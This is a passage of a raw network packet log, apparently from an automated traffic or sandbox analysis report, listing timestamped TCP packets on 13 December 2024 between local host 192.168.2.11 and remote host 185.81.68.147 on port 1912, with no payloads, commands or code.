                                                                                                                                                                                                Dec 13, 2024 08:19:14.904977083 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904984951 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904994011 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.904995918 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905005932 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905014992 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905016899 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905029058 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905038118 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905045986 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905054092 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905055046 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905065060 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905073881 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905077934 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905083895 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905093908 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905112982 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905117035 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905124903 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905133009 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905141115 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905149937 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905157089 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905165911 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905173063 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905180931 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905189991 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905198097 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905205965 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905214071 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905222893 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905231953 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905241013 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905251026 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905260086 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905268908 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905277014 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905284882 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905293941 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905302048 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905309916 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905318022 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905325890 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905333996 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905342102 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905349970 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905358076 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905366898 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.905462027 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:14.959897995 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:14.960012913 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025166035 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025260925 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025262117 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025270939 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025300026 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025337934 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025358915 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025366068 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025443077 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025475979 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025486946 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025523901 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025532007 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025546074 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025671005 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025742054 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025774956 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025794983 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025859118 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025888920 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.025991917 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026038885 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026072979 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026146889 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026156902 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026186943 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026264906 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026305914 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026396036 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026406050 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026483059 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026546955 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026556969 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026567936 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026691914 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026701927 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026774883 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026783943 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026865005 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026938915 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026948929 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.026998043 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027187109 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027214050 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027246952 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027331114 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027359962 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027436018 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027446032 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027463913 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027527094 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027533054 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027548075 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027564049 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027631044 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027631998 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027662992 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027714014 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027725935 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027743101 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027776003 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027780056 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027796984 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027836084 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027851105 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027879953 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.027935028 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028007030 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028037071 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028116941 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028146982 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028268099 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028297901 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028374910 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028426886 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028459072 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028510094 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028544903 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028625011 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028654099 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028706074 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028798103 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028831005 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028954029 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.028981924 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029014111 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029047012 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029145956 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029191971 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029339075 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029366970 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029395103 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029444933 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029473066 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029500961 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029534101 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029562950 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.029601097 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.079806089 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.145092010 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.145107985 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.145222902 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.145236015 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.145345926 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.145359039 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.145395041 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.145437002 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.145709991 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.147469044 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.147542953 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.147619963 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.147769928 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.147819996 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.147846937 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.147887945 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.147922039 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148025036 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148066998 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148153067 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148201942 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148247004 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148452997 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148559093 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148617983 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148694038 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148834944 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148849010 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148861885 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.148932934 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149065018 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149077892 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149128914 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149141073 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149199009 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149245024 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149341106 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149385929 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149496078 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149509907 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149604082 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149709940 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149760008 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149782896 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149797916 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149920940 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.149933100 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150037050 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150083065 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150187969 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150201082 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150259972 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150285006 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150299072 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150321007 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150414944 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150427103 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150469065 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150490999 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150583029 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150595903 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150722027 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150734901 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150757074 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.150768995 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.151194096 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.151258945 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.265530109 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.265609026 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.265619993 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.265671015 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.265733957 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.265841961 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.265851021 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.265888929 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266072989 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266094923 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266103983 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266207933 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266227007 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266401052 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266411066 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266511917 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266522884 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266654968 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266664982 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266683102 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266693115 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266748905 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266763926 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266808033 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266825914 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266881943 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.266900063 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267004967 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267045021 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267101049 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267111063 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267131090 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267196894 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267323971 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267333984 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267384052 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267393112 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267448902 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267457962 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267554045 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267564058 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267607927 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267703056 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267712116 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267802954 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267865896 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267875910 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267885923 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267987967 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.267998934 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.268084049 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.268093109 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.268192053 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.268202066 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.268461943 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.268543959 CET497601912192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271152020 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271178961 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271266937 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271277905 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271358013 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271392107 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271444082 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271507025 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271554947 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271606922 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271677017 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271704912 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271789074 CET191249760185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:15.271821976 CET191249760185.81.68.147192.168.2.11
